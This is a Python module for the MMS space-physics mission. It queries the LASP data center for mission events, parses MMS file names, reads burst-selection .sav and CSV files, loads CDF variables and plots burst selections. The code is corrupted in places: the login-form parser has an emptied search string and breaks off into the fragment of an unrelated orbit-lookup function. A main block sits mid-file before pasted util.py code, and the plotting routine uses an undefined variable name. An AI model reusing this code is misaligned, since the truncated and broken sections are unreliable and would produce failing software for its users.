associated\n with spacecraft `sc`. 
Defines when the SITL can submit selections.\n '''\n return _mission_data(start, stop, sc=sc,\n source='BDM', event_type='sitl_window')\n\n\ndef _mission_data(start, stop, sc=None,\n source=None, event_type=None):\n \"\"\"\n Download MMS mission events. See the filters on the webpage\n for more ideas.\n https://lasp.colorado.edu/mms/sdc/public/about/events/#/\n\n NOTE: some sources, such as 'burst_segment', return a format\n that is not yet parsed properly.\n\n Parameters\n ----------\n start, stop : `datetime.datetime`, int\n Start and end of the data interval, specified as a time or\n orbit range.\n sc : str\n Spacecraft ID (mms, mms1, mms2, mms3, mms4) for which event\n information is to be returned.\n source : str\n Source of the mission event. Options include\n 'Timeline', 'Burst', 'BDM', 'SITL'\n event_type : str\n Type of mission event. Options include\n BDM: sitl_window, evaluate_metadata, science_roi\n\n Returns\n -------\n data : dict\n Information about each event.\n start_time - Start time (UTC) of event %Y-%m-%dT%H:%M:%S.%f\n end_time - End time (UTC) of event %Y-%m-%dT%H:%M:%S.%f\n event_type - Type of event\n sc_id - Spacecraft to which the event applies\n source - Source of event\n description - Description of event\n discussion\n start_orbit - Orbit on which the event started\n end_orbit - Orbit on which the event ended\n tag\n id\n tstart - Start time of event as datetime\n tend - end time of event as datetime\n \"\"\"\n url = 'https://lasp.colorado.edu/' \\\n 'mms/sdc/public/service/latis/mms_events_view.csv'\n\n start_date = None\n end_date = None\n start_orbit = None\n end_orbit = None\n\n # mission_events() returns numpy integers, so check for\n # those, too\n if isinstance(start, (int, np.integer)):\n start_orbit = start\n else:\n start_date = start\n if isinstance(stop, (int, np.integer)):\n end_orbit = stop\n else:\n end_date = stop\n\n query = {}\n if start_date is not None:\n query['start_time_utc>'] = start_date.strftime('%Y-%m-%d')\n if end_date is not None:\n query['end_time_utc<'] = end_date.strftime('%Y-%m-%d')\n\n if start_orbit is not None:\n query['start_orbit>'] = start_orbit\n if end_orbit is not None:\n query['end_orbit<'] = end_orbit\n\n if sc is not None:\n query['sc_id'] = sc\n if source is not None:\n query['source'] = source\n if event_type is not None:\n query['event_type'] = event_type\n\n resp = requests.get(url, params=query)\n data = _response_text_to_dict(resp.text)\n\n # Convert to useful types\n types = ['str', 'str', 'str', 'str', 'str', 'str', 'str',\n 'int32', 'int32', 'str', 'int32']\n for items in zip(data, types):\n if items[1] == 'str':\n pass\n else:\n data[items[0]] = np.asarray(data[items[0]], dtype=items[1])\n\n # Add useful tags\n # - Number of seconds elapsed\n # - TAISTARTIME as datetime\n # - TAIENDTIME as datetime\n\n # NOTE! If data['TAISTARTTIME'] is a scalar, this will not work\n # unless everything after \"in\" is turned into a list\n data['tstart'] = [dt.datetime.strptime(\n value, '%Y-%m-%dT%H:%M:%S.%f'\n )\n for value in data['start_time']\n ]\n data['tend'] = [dt.datetime.strptime(\n value, '%Y-%m-%dT%H:%M:%S.%f'\n )\n for value in data['end_time']\n ]\n\n return data\n\n\ndef mission_events_v1(start_date=None, end_date=None,\n start_orbit=None, end_orbit=None,\n sc=None,\n source=None, event_type=None):\n \"\"\"\n Download MMS mission events. 
See the filters on the webpage\n for more ideas.\n https://lasp.colorado.edu/mms/sdc/public/about/events/#/\n\n NOTE: some sources, such as 'burst_segment', return a format\n that is not yet parsed properly.\n\n Parameters\n ----------\n start_date, end_date : `datetime.datetime`\n Start and end date of time interval. The interval is right-\n exclusive: [start_date, end_date). The time interval must\n encompass the desired data (e.g. orbit begin and end times)\n for it to be returned.\n start_orbit, end_orbit : `datetime.datetime`\n Start and end orbit of data interval. If provided with `start_date`\n or `end_date`, the two must overlap for any data to be returned.\n sc : str\n Spacecraft ID (mms, mms1, mms2, mms3, mms4) for which event\n information is to be returned.\n source : str\n Source of the mission event. Options include\n 'Timeline', 'Burst', 'BDM', 'SITL'\n event_type : str\n Type of mission event. Options include\n BDM: sitl_window, evaluate_metadata, science_roi\n\n Returns\n -------\n data : dict\n Information about each event.\n start_time - Start time (UTC) of event %Y-%m-%dT%H:%M:%S.%f\n end_time - End time (UTC) of event %Y-%m-%dT%H:%M:%S.%f\n event_type - Type of event\n sc_id - Spacecraft to which the event applies\n source - Source of event\n description - Description of event\n discussion\n start_orbit - Orbit on which the event started\n end_orbit - Orbit on which the event ended\n tag\n id\n tstart - Start time of event as datetime\n tend - end time of event as datetime\n \"\"\"\n url = 'https://lasp.colorado.edu/' \\\n 'mms/sdc/public/service/latis/mms_events_view.csv'\n\n query = {}\n if start_date is not None:\n query['start_time_utc>'] = start_date.strftime('%Y-%m-%d')\n if end_date is not None:\n query['end_time_utc<'] = end_date.strftime('%Y-%m-%d')\n\n if start_orbit is not None:\n query['start_orbit>'] = start_orbit\n if end_orbit is not None:\n query['end_orbit<'] = end_orbit\n\n if sc is not None:\n query['sc_id'] = sc\n if source is not None:\n query['source'] = source\n if event_type is not None:\n query['event_type'] = event_type\n\n resp = requests.get(url, params=query)\n data = _response_text_to_dict(resp.text)\n\n # Convert to useful types\n types = ['str', 'str', 'str', 'str', 'str', 'str', 'str',\n 'int32', 'int32', 'str', 'int32']\n for items in zip(data, types):\n if items[1] == 'str':\n pass\n else:\n data[items[0]] = np.asarray(data[items[0]], dtype=items[1])\n\n # Add useful tags\n # - Number of seconds elapsed\n # - TAISTARTIME as datetime\n # - TAIENDTIME as datetime\n # data[\"start_time_utc\"] = data.pop(\"start_time_utc \"\n # \"(yyyy-mm-dd'T'hh:mm:ss.sss)\"\n # )\n # data[\"end_time_utc\"] = data.pop(\"end_time_utc \"\n # \"(yyyy-mm-dd'T'hh:mm:ss.sss)\"\n # )\n\n # NOTE! 
If data['TAISTARTTIME'] is a scalar, this will not work\n # unless everything after \"in\" is turned into a list\n data['tstart'] = [dt.datetime.strptime(\n value, '%Y-%m-%dT%H:%M:%S.%f'\n )\n for value in data['start_time']\n ]\n data['tend'] = [dt.datetime.strptime(\n value, '%Y-%m-%dT%H:%M:%S.%f'\n )\n for value in data['end_time']\n ]\n\n return data\n\n\ndef parse_file_name(fname):\n \"\"\"\n Parse a file name compliant with MMS file name format guidelines.\n\n Parameters\n ----------\n fname : str\n File name to be parsed.\n\n Returns\n -------\n parts : tuple\n The tuple elements are:\n [0]: Spacecraft IDs\n [1]: Instrument IDs\n [2]: Data rate modes\n [3]: Data levels\n [4]: Optional descriptor (empty string if not present)\n [5]: Start times\n [6]: File version number\n \"\"\"\n\n parts = os.path.basename(fname).split('_')\n\n # data_type = '*_selections'\n if 'selections' in fname:\n # datatype_glstype_YYYY-mm-dd-HH-MM-SS.sav\n if len(parts) == 3:\n gls_type = ''\n else:\n gls_type = parts[2]\n\n # (data_type, [gls_type,] start_date)\n out = ('_'.join(parts[0:2]), gls_type, parts[-1][0:-4])\n\n # data_type = 'science'\n else:\n # sc_instr_mode_level_[optdesc]_fstart_vVersion.cdf\n if len(parts) == 6:\n optdesc = ''\n else:\n optdesc = parts[4]\n\n # (sc, instr, mode, level, [optdesc,] start_date, version)\n out = (*parts[0:4], optdesc, parts[-2], parts[-1][1:-4])\n\n return out\n\n\ndef parse_time(times):\n \"\"\"\n Parse the start time of MMS file names.\n\n Parameters\n ----------\n times : str, list\n Start times of file names.\n\n Returns\n -------\n parts : list\n A list of tuples. The tuple elements are:\n [0]: Year\n [1]: Month\n [2]: Day\n [3]: Hour\n [4]: Minute\n [5]: Second\n \"\"\"\n if isinstance(times, str):\n times = [times]\n\n # Three types:\n # srvy YYYYMMDD\n # brst YYYYMMDDhhmmss\n # selections YYYY-MM-DD-hh-mm-ss\n parts = [None] * len(times)\n for idx, time in enumerate(times):\n if len(time) == 19:\n parts[idx] = (time[0:4], time[5:7], time[8:10],\n time[11:13], time[14:16], time[17:]\n )\n elif len(time) == 14:\n parts[idx] = (time[0:4], time[4:6], time[6:8],\n time[8:10], time[10:12], time[12:14]\n )\n else:\n parts[idx] = (time[0:4], time[4:6], time[6:8], '00', '00', '00')\n\n return parts\n\n\ndef read_eva_fom_structure(sav_filename):\n '''\n Returns a dictionary that mirrors the SITL selections fomstr structure\n that is in the IDL .sav file.\n\n Parameters\n ----------\n sav_filename : str\n Name of the IDL sav file containing the SITL selections\n\n Returns\n -------\n data : dict\n The FOM structure.\n valid : 1 if the fom structure is valid, 0 otherwise\n error : Error string for invalid fom structures\n algversion\n sourceid : username of the SITL that made the selections\n cyclestart\n numcycles\n nsegs : number of burst segments\n start : index into timestamps of start time for each burst segment\n stop : index into timestamps of stop time for each burst segment\n seglengths\n fom : figure of merit for each burst segment\n nubffs\n mdq : mission data quality\n timestamps : timestamp (TAI seconds since 1958) of each mdq\n targetbuffs\n fomave\n targetratio\n minsegmentsize\n maxsegmentsize\n pad\n searchratio\n fomwindowsize\n fomslope\n fomskew\n fombias\n metadatainfo\n oldestavailableburstdata :\n metadataevaltime\n discussion : description of each burst segment given by the SITL\n note : note given by SITL to data within SITL window\n datetimestamps : timestamps converted to datetimes\n start_time : start time of the burst segment\n end_time 
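Mirroring parse_file_name()'s science branch on a representative name (the splitting logic is inlined here rather than imported):

import os

fname = 'mms1_fpi_fast_l2_dis-moms_20191001000000_v3.3.0.cdf'
parts = os.path.basename(fname).split('_')
optdesc = '' if len(parts) == 6 else parts[4]
out = (*parts[0:4], optdesc, parts[-2], parts[-1][1:-4])
assert out == ('mms1', 'fpi', 'fast', 'l2', 'dis-moms',
               '20191001000000', '3.3.0')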
: end time of the burst segment\n tstart : datetime timestamp of the start of each burst segment\n tstop : datetime timestamp of the end of each burst segment\n '''\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\")\n sav = readsav(sav_filename)\n\n assert 'fomstr' in sav, 'save file does not have a fomstr structure'\n fomstr = sav['fomstr']\n\n # Handle invalid structures\n # - example: abs_selections_2017-10-29-09-25-34.sav\n if fomstr.valid[0] == 0:\n d = {'valid': int(fomstr.valid[0]),\n 'error': fomstr.error[0].decode('utf-8'),\n 'errno': int(fomstr.errno[0])\n }\n return d\n\n d = {'valid': int(fomstr.valid[0]),\n 'error': fomstr.error[0],\n 'algversion': fomstr.algversion[0].decode('utf-8'),\n 'sourceid': [x.decode('utf-8') for x in fomstr.sourceid[0]],\n 'cyclestart': int(fomstr.cyclestart[0]),\n 'numcycles': int(fomstr.numcycles[0]),\n 'nsegs': int(fomstr.nsegs[0]),\n 'start': fomstr.start[0].tolist(),\n 'stop': fomstr.stop[0].tolist(),\n 'seglengths': fomstr.seglengths[0].tolist(),\n 'fom': fomstr.fom[0].tolist(),\n 'nbuffs': int(fomstr.nbuffs[0]),\n 'mdq': fomstr.mdq[0].tolist(),\n 'timestamps': fomstr.timestamps[0].tolist(),\n 'targetbuffs': int(fomstr.targetbuffs[0]),\n 'fomave': float(fomstr.fomave[0]),\n 'targetratio': float(fomstr.targetratio[0]),\n 'minsegmentsize': float(fomstr.minsegmentsize[0]),\n 'maxsegmentsize': float(fomstr.maxsegmentsize[0]),\n 'pad': int(fomstr.pad[0]),\n 'searchratio': float(fomstr.searchratio[0]),\n 'fomwindowsize': int(fomstr.fomwindowsize[0]),\n 'fomslope': float(fomstr.fomslope[0]),\n 'fomskew': float(fomstr.fomskew[0]),\n 'fombias': float(fomstr.fombias[0]),\n 'metadatainfo': fomstr.metadatainfo[0].decode('utf-8'),\n 'oldestavailableburstdata': fomstr.oldestavailableburstdata[0].decode('utf-8'),\n 'metadataevaltime': fomstr.metadataevaltime[0].decode('utf-8')\n }\n try:\n d['discussion'] = [x.decode('utf-8') for x in fomstr.discussion[0]]\n except AttributeError:\n d['discussion'] = ['ABS Selections'] * len(d['start'])\n try:\n d['note'] = fomstr.note[0].decode('utf-8')\n except AttributeError:\n d['note'] = 'ABS Selections'\n\n # Convert TAI to datetime\n # - timestaps are TAI seconds elapsed since 1958-01-01\n # - tt2000 are nanoseconds elapsed since 2000-01-01\n t_1958 = epochs.CDFepoch.compute_tt2000([1958, 1, 1, 0, 0, 0, 0, 0, 0])\n tepoch = epochs.CDFepoch()\n d['datetimestamps'] = tepoch.to_datetime(\n np.asarray(d['timestamps']) * int(1e9) +\n t_1958\n )\n\n # FOM structure (copy procedure from IDL/SPEDAS/EVA)\n # - eva_sitl_load_soca_simple\n # - eva_sitl_strct_read\n # - mms_convert_from_tai2unix\n # - mms_tai2unix\n if 'fomslope' in d:\n if d['stop'][d['nsegs'] - 1] >= d['numcycles']:\n raise ValueError('Number of segments should be <= # cycles.')\n\n taistarttime = []\n taiendtime = []\n tstart = []\n tstop = []\n t_fom = [d['datetimestamps'][0]]\n fom = [0]\n dtai_last = (d['timestamps'][d['numcycles'] - 1] -\n d['timestamps'][d['numcycles'] - 2])\n dt_last = (d['datetimestamps'][d['numcycles'] - 1] -\n d['datetimestamps'][d['numcycles'] - 2])\n\n # Extract the start and stop times of the FOM values\n # Create a time series for FOM values\n for idx in range(d['nsegs']):\n taistarttime.append(d['timestamps'][d['start'][idx]])\n tstart.append(d['datetimestamps'][d['start'][idx]])\n if d['stop'][idx] <= d['numcycles'] - 1:\n taiendtime.append(d['timestamps'][d['stop'][idx] + 1])\n tstop.append(d['datetimestamps'][d['stop'][idx] + 1])\n else:\n taiendtime.append(d['timestamps'][d['numcycles'] - 1] + dtai_last)\n 
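In the FOM loop above, start and stop index the per-cycle timestamps array, and stop is inclusive, so a segment's end time is the following cycle's timestamp. Reduced to toy numbers:

timestamps = [0, 10, 20, 30, 40]   # one timestamp per cycle
start, stop = [1], [2]             # one segment spanning cycles 1..2
tstart = [timestamps[s] for s in start]
tend = [timestamps[s + 1] for s in stop]
assert (tstart, tend) == ([10], [30])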
tstop.append(d['datetimestamps'][d['numcycles'] - 1] + dt_last)\n\n # Append the last time stamp to the time series\n t_fom.append(d['datetimestamps'][d['numcycles'] - 1] + dt_last)\n fom.append(0)\n\n # BAK structure\n else:\n raise NotImplemented('BAK structure has not been implemented')\n nsegs = len(d['fom']) # BAK\n\n # Add to output structure\n d['taistarttime'] = taistarttime\n d['taiendtime'] = taiendtime\n d['start_time'] = [t.strftime('%Y-%m-%d %H:%M:%S') for t in tstart]\n d['stop_time'] = [t.strftime('%Y-%m-%d %H:%M:%S') for t in tstop]\n d['tstart'] = tstart\n d['tstop'] = tstop\n d['createtime'] = [file_start_time(sav_filename)] * d['nsegs']\n\n return d\n\n\ndef read_gls_csv(filename):\n \"\"\"\n Read a ground loop selections (gls) CSV file.\n\n Parameters\n ----------\n filename : str\n Name of the CSV file to be read\n\n Returns\n -------\n data : dict\n Data contained in the CSV file\n \"\"\"\n # Dictionary to hold data from csv file\n keys = ['start_time', 'stop_time', 'sourceid', 'fom', 'discussion',\n 'taistarttime', 'taiendtime', 'tstart', 'tstop', 'createtime']\n data = {key: [] for key in keys}\n\n # CSV files have their generation time in the file name.\n # Multiple CSV files may have been created for the same\n # data interval, which results in duplicate data. Use\n # a set to keep only unique data entries.\n tset = set()\n nold = 0\n\n # Constant for converting times to TAI seconds since 1958\n t_1958 = epochs.CDFepoch.compute_tt2000([1958, 1, 1, 0, 0, 0, 0, 0, 0])\n\n # Parse each row of all files\n skip_file = False\n nentry_skip = 0\n nentry_expand = 0\n with open(filename) as f:\n fstart = file_start_time(filename)\n\n reader = csv.reader(f)\n for row in reader:\n tstart = dt.datetime.strptime(\n row[0], '%Y-%m-%d %H:%M:%S'\n )\n tstop = dt.datetime.strptime(\n row[1], '%Y-%m-%d %H:%M:%S'\n )\n\n # Convert times to TAI seconds since 1958\n t0 = _datetime_to_list(tstart)\n t1 = _datetime_to_list(tstop)\n t0 = int((epochs.CDFepoch.compute_tt2000(t0) - t_1958) // 1e9)\n t1 = int((epochs.CDFepoch.compute_tt2000(t1) - t_1958) // 1e9)\n\n # Ensure selections have a minimum length of 10 seconds\n if (t1 - t0) == 0:\n t1 += int(10)\n tstop += dt.timedelta(seconds=10)\n row[1] = dt.datetime.strftime(\n tstop, '%Y-%m-%d %H:%M:%S'\n )\n nentry_expand += 1\n\n # Some burst segments are unrealistically long\n # - Usually, the longest have one selection per file\n if ((t1 - t0) > 3600):\n with open(filename) as f_test:\n nrows = sum(1 for row in f_test)\n if nrows == 1:\n skip_file = True\n break\n\n # Some entries have negative durations\n if (t1 - t0) < 0:\n nentry_skip += 1\n continue\n\n # Store data\n data['taistarttime'].append(t0)\n data['taiendtime'].append(t1)\n data['start_time'].append(row[0])\n data['stop_time'].append(row[1])\n data['fom'].append(float(row[2]))\n data['discussion'].append(','.join(row[3:]))\n data['tstart'].append(tstart)\n data['tstop'].append(tstop)\n data['createtime'].append(fstart)\n\n # Source ID is the name of the GLS model\n parts = parse_file_name(filename)\n data['sourceid'].extend([parts[1]] * len(data['fom']))\n\n # Errors\n data['errors'] = {'fskip': skip_file,\n 'nexpand': nentry_expand,\n 'nskip': nentry_skip\n }\n\n return data\n\n\ndef _sdc_parse_form(r):\n '''Parse key-value pairs from the log-in form\n\n Parameters\n ----------\n r (object): requests.response object.\n\n Returns\n -------\n form (dict): key-value pairs parsed from the form.\n '''\n # Find action URL\n pstart = r.text.find('', pstart)\n paction = 
r.text.find('action', pstart, pend)\n    pquote1 = r.text.find('\"', pstart, pend)\n    pquote2 = r.text.find('\"', pquote1 + 1, pend)\n    url5 = r.text[pquote1 + 1:pquote2]\n    url5 = url5.replace('&#58;', ':')\n    url5 = url5.replace('&#47;', '/')\n\n    # Parse values from the form\n    pinput = r.text.find('<input', pquote2 + 1)\n    inputs = dict()\n    pend = r.text.find('>', pinput)\n\n    # Name\n    pname = r.text.find('name', pinput, pend)\n    pquote1 = r.text.find('\"', pname, pend)\n    pquote2 = r.text.find('\"', pquote1 + 1, pend)\n    name = r.text[pquote1 + 1:pquote2]\n\n    # Value\n    if pname != -1:\n        pvalue = r.text.find('value', pquote2 + 1, pend)\n        pquote1 = r.text.find('\"', pvalue, pend)\n        pquote2 = r.text.find('\"', pquote1 + 1, pend)\n        value = r.text[pquote1 + 1:pquote2]\n        value = value.replace('&#58;', ':')\n\n        # Extract the values\n        inputs[name] = value\n\n    # Next iteration\n    pinput = r.text.find('<input', pend + 1)\n\n# [A block of code is missing here: HTML-tag stripping removed the remainder\n# of _sdc_parse_form and the header of the function that maps a time to an\n# orbit number; the following lines are the surviving tail of that function.]\n        if (time > orbits['tstart'][idx]) and (time < orbits['tend'][idx]):\n            orbit = orbits['start_orbit'][idx]\n    if orbit is None:\n        raise ValueError('Did not find correct orbit!')\n\n    return orbit\n\n\nif __name__ == '__main__':\n    '''Download data'''\n\n    # Inputs common to each calling sequence\n    #   - sys.argv[0] is the script name, so arguments start at index 1\n    sc = sys.argv[1]\n    instr = sys.argv[2]\n    mode = sys.argv[3]\n    level = sys.argv[4]\n\n    # Basic dataset\n    if len(sys.argv) == 7:\n        optdesc = None\n        start_date = sys.argv[5]\n        end_date = sys.argv[6]\n\n    # Optional descriptor given\n    elif len(sys.argv) == 8:\n        optdesc = sys.argv[5]\n        start_date = sys.argv[6]\n        end_date = sys.argv[7]\n\n    # Error\n    else:\n        raise TypeError('Incorrect number of inputs.')\n\n    # Create the request\n    api = MrMMS_SDC_API(sc, instr, mode, level,\n                        optdesc=optdesc, start_date=start_date, end_date=end_date)\n\n    # Download the data\n    files = api.download_files()\n\ndef sort_files(files):\n    \"\"\"\n    Sort MMS file names by data product and time.\n\n    Parameters\n    ----------\n    files : str, list\n        Files to be sorted\n\n    Returns\n    -------\n    sorted : tuple\n        Sorted file names. 
Each tuple element corresponds to\n a unique data product.\n \"\"\"\n\n # File types and start times\n parts = [parse_file_name(file) for file in files]\n bases = ['_'.join(p[0:5]) for p in parts]\n tstart = [p[-2] for p in parts]\n\n # Sort everything\n idx = sorted(range(len(tstart)), key=lambda k: tstart[k])\n bases = [bases[i] for i in idx]\n files = [files[i] for i in idx]\n\n # Find unique file types\n fsort = []\n uniq_bases = list(set(bases))\n for ub in uniq_bases:\n fsort.append([files[i] for i, b in enumerate(bases) if b == ub])\n\n return tuple(fsort)\n\n\n\n\n# the following is the code from the util.py file\n\n\n# cdfepoch requires datetimes to be broken down into 9-element lists\ndef datetime_to_list(t):\n return [t.year, t.month, t.day,\n t.hour, t.minute, t.second,\n int(t.microsecond // 1e3),\n int(t.microsecond % 1e3),\n 0]\n\n\ndef tt2000_range(cdf, t_vname, start_date, end_date):\n # Create lists\n tstart = datetime_to_list(start_date)\n tend = datetime_to_list(end_date)\n\n # Convert to TT2000\n tstart = cdflib.cdfepoch.compute(tstart)\n tend = cdflib.cdfepoch.compute(tend)\n\n # Find the time range\n return cdf.epochrange(epoch=t_vname, starttime=tstart, endtime=tend)\n\n\ndef from_cdflib(files, varname, start_date, end_date):\n global cdf_vars\n global file_vars\n\n if isinstance(files, str):\n files = [files]\n tstart = datetime_to_list(start_date)\n tend = datetime_to_list(end_date)\n\n # Extract metadata\n cdf_vars = {}\n for file in files:\n file_vars = {}\n cdf = cdflib.CDF(file)\n\n try:\n data = cdflib_readvar(cdf, varname, tstart, tend)\n except:\n cdf.close()\n raise\n\n cdf.close()\n\n return data\n\n\ndef cdflib_readvar(cdf, varname, tstart, tend):\n global cdf_vars\n global file_vars\n\n # Data has already been read from this file\n if varname in file_vars:\n var = file_vars[varname]\n else:\n time_types = ('CDF_EPOCH', 'CDF_EPOCH16', 'CDF_TIME_TT2000')\n varinq = cdf.varinq(varname)\n\n # Convert epochs to datetimes\n data = cdf.varget(variable=varname, starttime=tstart, endtime=tend)\n if varinq['Data_Type_Description'] in time_types:\n data = cdflib.cdfepoch().to_datetime(data)\n\n # If the variable has been read from a different file, append\n if (varname in cdf_vars) and varinq['Rec_Vary']:\n d0 = cdf_vars[varname]\n data = np.append(d0['data'], data, 0)\n\n # Create the variable\n var = {'name': varname,\n 'data': data,\n 'rec_vary': varinq['Rec_Vary'],\n 'cdf_name': varinq['Variable'],\n 'cdf_type': varinq['Data_Type_Description']\n }\n\n # List as read\n # - Prevent infinite loop. 
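cdfepoch expects the 9-element breakdown produced by datetime_to_list(), with microseconds split into milliseconds and remainder microseconds. Checking that split by hand:

import datetime as dt

t = dt.datetime(2019, 10, 1, 13, 35, 23, 123456)
lst = [t.year, t.month, t.day, t.hour, t.minute, t.second,
       int(t.microsecond // 1e3), int(t.microsecond % 1e3), 0]
assert lst == [2019, 10, 1, 13, 35, 23, 123, 456, 0]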
Must save the variable in the registry\n # so that variable attributes do not try to read the same variable\n # again.\n cdf_vars[varname] = var\n file_vars[varname] = var\n\n # Read the metadata\n cdflib_attget(cdf, var, tstart, tend)\n\n return var\n\n\ndef cdflib_attget(cdf, var, tstart, tend):\n # Get variable attributes for given variable\n varatts = cdf.varattsget(var['cdf_name'])\n\n # Get names of all cdf variables\n cdf_varnames = cdf.cdf_info()['zVariables']\n\n # Follow pointers to retrieve data\n for attrname, attrvalue in varatts.items():\n var[attrname] = attrvalue\n if isinstance(attrvalue, str) and (attrvalue in cdf_varnames):\n var[attrvalue] = cdflib_readvar(cdf, attrvalue, tstart, tend)\n\n\ndef plot_1D(data, axes):\n # Plot the data\n lines = axes.plot(mdates.date2num(data[data['DEPEND_0']]['data']),\n data['data'])\n\n try:\n axes.set_yscale(data['SCALETYP'])\n except KeyError:\n pass\n\n try:\n for line, color in zip(lines, data['color']):\n line.set_color(color)\n except KeyError:\n pass\n\n try:\n # Set the label for each line so that they can\n # be returned by Legend.get_legend_handles_labels()\n for line, label in zip(lines, data[data['LABL_PTR_1']]['data']):\n line.set_label(label)\n\n # Create the legend outside the right-most axes\n leg = axes.legend(bbox_to_anchor=(1.05, 1),\n borderaxespad=0.0,\n frameon=False,\n handlelength=0,\n handletextpad=0,\n loc='upper left')\n\n # Color the text the same as the lines\n for line, text in zip(lines, leg.get_texts()):\n text.set_color(line.get_color())\n\n except KeyError:\n pass\n\n\ndef plot_2D(data, axes):\n # Convert time to seconds and reshape to 2D arrays\n x0 = mdates.date2num(data[data['DEPEND_0']]['data'])\n x1 = data[data['DEPEND_1']]['data']\n if x0.ndim == 1:\n x0 = np.repeat(x0[:, np.newaxis], data['data'].shape[1], axis=1)\n if x1.ndim == 1:\n x1 = np.repeat(x1[np.newaxis, :], data['data'].shape[0], axis=0)\n\n # Format the image\n y = data['data'][0:-1, 0:-1]\n try:\n if data['SCALETYP'] == 'log':\n y = np.ma.log(y)\n except KeyError:\n pass\n\n # Create the image\n im = axes.pcolorfast(x0, x1, y, cmap='nipy_spectral')\n axes.images.append(im)\n\n try:\n axes.set_yscale(data[data['DEPEND_1']]['SCALETYP'])\n except KeyError:\n pass\n\n # Create a colorbar to the right of the image\n cbaxes = inset_axes(axes,\n width='1%', height='100%', loc=4,\n bbox_to_anchor=(0, 0, 1.05, 1),\n bbox_transform=axes.transAxes,\n borderpad=0)\n cb = plt.colorbar(im, cax=cbaxes, orientation='vertical')\n\n\ndef plot_burst_selections(sc, start_date, end_date,\n figsize=(5.5, 7)):\n mode = 'srvy'\n level = 'l2'\n\n\n\n\n # FGM\n b_vname = '_'.join((sc, 'fgm', 'b', 'gse', mode, level))\n mms = MrMMS_SDC_API(sc, 'fgm', mode, level,\n start_date=start_date, end_date=end_date)\n files = mms.download_files()\n files = sort_files(files)[0]\n#us different function here\n fgm_data = ff.cdf_to_df(files,b_vname) # from_cdflib(files, b_vname,\n #start_date, end_date)\n fgm_data['data'] = fgm_data['data'][:, [3, 0, 1, 2]]\n fgm_data['color'] = ['Black', 'Blue', 'Green', 'Red']\n fgm_data[fgm_data['LABL_PTR_1']]['data'] = ['|B|', 'Bx', 'By', 'Bz']\n\n # FPI DIS\n fpi_mode = 'fast'\n ni_vname = '_'.join((sc, 'dis', 'numberdensity', fpi_mode))\n espec_i_vname = '_'.join((sc, 'dis', 'energyspectr', 'omni', fpi_mode))\n BV_vname = '_'.join((sc,'dis','bulkv_gse',fpi_mode))\n mms = MrMMS_SDC_API(sc, 'fpi', fpi_mode, level,\n optdesc='dis-moms',\n start_date=start_date, end_date=end_date)\n files = mms.download_files()\n files = 
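plot_1D() assumes a CDF-like dict in which 'data' holds the values and 'DEPEND_0' names the key of the time variable. A minimal self-contained plot with that layout, using the Agg backend so it runs headless; the sample values are made up:

import datetime as dt

import matplotlib
matplotlib.use('Agg')                      # headless backend for this example
import matplotlib.dates as mdates
import matplotlib.pyplot as plt

data = {'data': [1.0, 2.0, 1.5],
        'DEPEND_0': 't',
        't': {'data': [dt.datetime(2019, 10, 1, h) for h in (0, 1, 2)]}}

fig, axes = plt.subplots()
axes.plot(mdates.date2num(data[data['DEPEND_0']]['data']), data['data'])
fig.savefig('plot_1d_example.png')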
sort_files(files)[0]\n\n ni_data = ff.cdf_to_df(files,ni_vname)#from_cdflib(files, ni_vname,\n # start_date, end_date)\n especi_data = ff.cdf_to_df(files,espec_i_vname)#from_cdflib(files, espec_i_vname,\n # start_date, end_date)\n BV_data = ff.cdf_to_df(files,BV_name)#from_cdflib(files, BV_vname,\n # start_date,end_date)\n\n # FPI DES\n ne_vname = '_'.join((sc, 'des', 'numberdensity', fpi_mode))\n espec_e_vname = '_'.join((sc, 'des', 'energyspectr', 'omni', fpi_mode))\n mms = MrMMS_SDC_API(sc, 'fpi', fpi_mode, level,\n optdesc='des-moms',\n start_date=start_date, end_date=end_date)\n files = mms.download_files()\n files = sort_files(files)[0]\n #ne_data = from_cdflib(files, ne_vname,\n # start_date, end_date)\n espece_data = ff.cdf_to_df(files,espec_e_vname)#from_cdflib(files, espec_e_vname,\n # start_date, end_date)\n\n # Grab selections\n abs_data = selections('abs', start_date, end_date,\n combine=True, sort=True,filter= 'MP')\n sitl_data = selections('sitl+back', start_date, end_date,\n combine=True, sort=True,filter='MP')\n gls_data = selections('mp-dl-unh', start_date, end_date,\n combine=True, sort=True,filter='MP')\n\n # SITL data time series\n t_abs = []\n x_abs = []\n for selection in abs_data:\n t_abs.extend([selection.tstart, selection.tstart,\n selection.tstop, selection.tstop])\n x_abs.extend([0, selection.fom, selection.fom, 0])\n if len(abs_data) == 0:\n t_abs = [start_date, end_date]\n x_abs = [0, 0]\n abs = {'data': x_abs,\n 'DEPEND_0': 't',\n 't': {'data': t_abs}}\n\n t_sitl = []\n x_sitl = []\n for selection in sitl_data:\n t_sitl.extend([selection.tstart, selection.tstart,\n selection.tstop, selection.tstop])\n x_sitl.extend([0, selection.fom, selection.fom, 0])\n if len(sitl_data) == 0:\n t_sitl = [start_date, end_date]\n x_sitl = [0, 0]\n sitl = {'data': x_sitl,\n 'DEPEND_0': 't',\n 't': {'data': t_sitl}}\n\n t_gls = []\n x_gls = []\n for selection in gls_data:\n t_gls.extend([selection.tstart, selection.tstart,\n selection.tstop, selection.tstop])\n x_gls.extend([0, selection.fom, selection.fom, 0])\n if len(gls_data) == 0:\n t_gls = [start_date, end_date]\n x_gls = [0, 0]\n gls = {'data': x_gls,\n 'DEPEND_0': 't',\n 't': {'data': t_gls}}\n\n # Setup plot\n nrows = 8#7\n ncols = 1\n fig, axes = plt.subplots(nrows=nrows, ncols=ncols,\n figsize=figsize, squeeze=False)\n locator = mdates.AutoDateLocator()\n formatter = mdates.ConciseDateFormatter(locator)\n\n # Plot FGM\n plot_2D(especi_data, axes[0, 0])\n axes[0, 0].set_title(sc.upper())\n fig.axes[-1].set_label('DEF')\n axes[0, 0].set_ylabel('$E_{ion}$\\n(eV)')\n axes[0, 0].set_xticks([])\n axes[0, 0].set_xlabel('')\n\n plot_2D(espece_data, axes[1, 0])\n fig.axes[-1].set_label('DEF\\nLog_{10}(keV/(cm^2 s sr keV))')\n axes[1, 0].set_ylabel('$E_{e-}$\\n(eV)')\n axes[1, 0].set_xticks([])\n axes[1, 0].set_xlabel('')\n axes[1, 0].set_title('')\n\n plot_1D(fgm_data, axes[2, 0])\n axes[2, 0].set_ylabel('B\\n(nT)')\n axes[2, 0].set_xticks([])\n axes[2, 0].set_xlabel('')\n axes[2, 0].set_title('')\n\n plot_1D(ni_data, axes[3, 0])\n axes[3, 